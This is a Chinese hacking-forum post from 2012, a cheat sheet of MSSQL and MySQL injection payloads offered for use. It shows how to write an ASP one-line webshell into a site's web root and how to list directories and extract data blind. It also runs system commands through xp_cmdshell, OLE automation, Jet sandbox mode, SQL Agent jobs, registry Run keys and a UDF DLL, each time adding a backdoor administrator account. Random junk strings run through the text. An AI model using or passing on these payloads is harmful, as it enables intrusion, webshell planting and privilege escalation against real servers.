找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3020|回复: 0
打印 上一主题 下一主题

mssql实用命令及导出一句话

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:49:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
MSSQL语句导出一句话木马2 ^! l) E; c7 T$ r! n
首先确定网站的WEB路径( e& r, @# r6 U2 W/ U/ ~/ U+ w
;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马
6 O$ p& i' P5 M1 j+ {
" ]/ w1 z, V3 x4 F;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');--
1 E$ ~8 E$ b' D/ f! M//将一句话木马插入表中+ [: E8 g1 e% o. Y+ I- S$ D: V
  s# N" y# `& {# g7 w' l* k+ _
;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';--
' w9 \* H- {" }5 D$ e$ h//导出一个ASP文件% _6 x( j3 S" `

0 z; u8 r% f6 R) ]) n1 \$ e% u, \! w2 B! }
关于MSSQL列目录: L% x& _2 ]3 h, I) K
;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表) m! c4 g) G/ g3 T
Insert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表
8 m) h1 j' Z% i, j" D$ n! Z4 @2 Q0 D% g% |$ g0 v
and (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录3 _$ D( m4 u. g4 l8 o- m" o
% l1 |8 j  f; ]) H( v; I; G& }: R9 [& s0 a
And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段
" B6 j* }) u4 H) q: e  @3 ?
9 x/ X- ^! J% M' KAnd (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符
4 }6 w/ B" O; n% y# I
  L: Q7 L9 h9 i% n0 A: k% T
# E: ~7 W! r) s" O" c数据库版本和权限查看
" Y: u) S+ n% W4 \, d6 n) G  qand 1=(select @@VERSION) //查看详细的数据库信息.0 {+ c% G- |, X1 C0 ?) W+ {
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA
+ j6 W2 B, [8 n: `and 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER
) T6 @) d, i) F( |/ s
( l% b6 z4 k* b) I; e8 k/ m9 d, H1 C$ X
1.利用xp_cmdshell执行命令8 u% S& R- T$ B$ A7 }$ M' n3 s; z
exec master..xp_cmdshell 'net user rfire 123456 /add'( J9 R, m1 q3 I, g: {! ]3 e  u% I
exec master..xp_cmdshell 'net localgroup administrators rfire /add'+ F3 e0 P  b3 W0 }, j9 C
; U7 H% }0 O( k
恢复xp_cmdshell存储过程
5 s( N6 }- C) F! J# e( uExec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
! u4 S( L/ A+ J" F
: t5 T2 z$ F- G% K
/ K7 ^0 ?  {6 G2.利用SP_OAcreate和SP_OAMETHOD执行命令1 Z# r+ g: z" ?- W7 w
在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下* a% k" N1 m  s7 f
DECLARE @shell INT //建立一个@shell实体
, i0 }6 f$ l, ~( m9 h5 e8 ?: `EXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例3 ]& A. a, y3 V
EXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例0 ]% k1 f" U8 c) j  S. F: U' M- w
  V+ Q* g4 R$ A: u. y# t! q

4 D! x4 X, L: u& T  c0 t/ S3.利用沙盒模式
8 Y1 S4 j& w# w先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。, x3 \+ D& t1 v" g& k/ |( z+ Y& C
开启沙盒模式:
' T2 ^, j  y$ p4 N0 g* J0 QEXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0
+ g" u2 S1 _7 b' S
0 F& d; L1 u4 Z0 v执行命令:
: s# ^# |  T8 H0 ASelect * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');. i  B# j2 H5 {9 }

1 ~% Q9 t' N# i9 a- z. w- R5 W" o/ c4 f
& s0 o8 [- n; c0 F; c+ D$ C# `4.利用SQL代理执行命令
7 q% o* S+ h8 r- r' kEXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务4 n' W3 J  [. [1 n9 ]9 }9 Y( U

, z& j# \0 A" t4 A. b3 h, V执行命令:
# t7 z2 D+ Z& ~% d5 puse msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错
8 {6 c% W( l6 I1 U1 m2 x: iexec sp_add_job 'x'1 h' b# f# j7 c
exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业7 p+ \2 q+ d/ Y: _, p3 u0 K
exec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业
- k8 Q# R* ]1 W) `; H7 ^
" g! e; P1 o( [9 J1 ^; r* k+ X8 ~/ k
5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)
' k: e' Z; S2 |+ O( C& {0 F7 }EXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'
5 J2 }6 o  `9 B, C
8 @8 N- Q* a6 m# |
5 I' S/ N# p+ c$ e- E( A- y' `3 P* z6.MYSQL的命令执行
- K$ I: g& g3 JMYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)  Y6 ^) D8 j$ n: F; L
首先要在su.php下导出c:\windows\udf.dll
6 N5 c) T$ o3 c' h, @! O3 A导出后执行创建自定义函数命令:0 @/ M8 Z0 S6 ~0 T
Create Function cmdshell returns string soname 'udf.dll'2 N* B- J9 o, G' J+ Q: ?
执行命令
7 I* _! ^; }* h' f6 ?select cmdshell('net user rfire 123456 /add')
# W8 s( L" E0 e% G执行后删除函数 drop function cmdshell
* l5 c+ ~- d9 q$ J8 k" x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表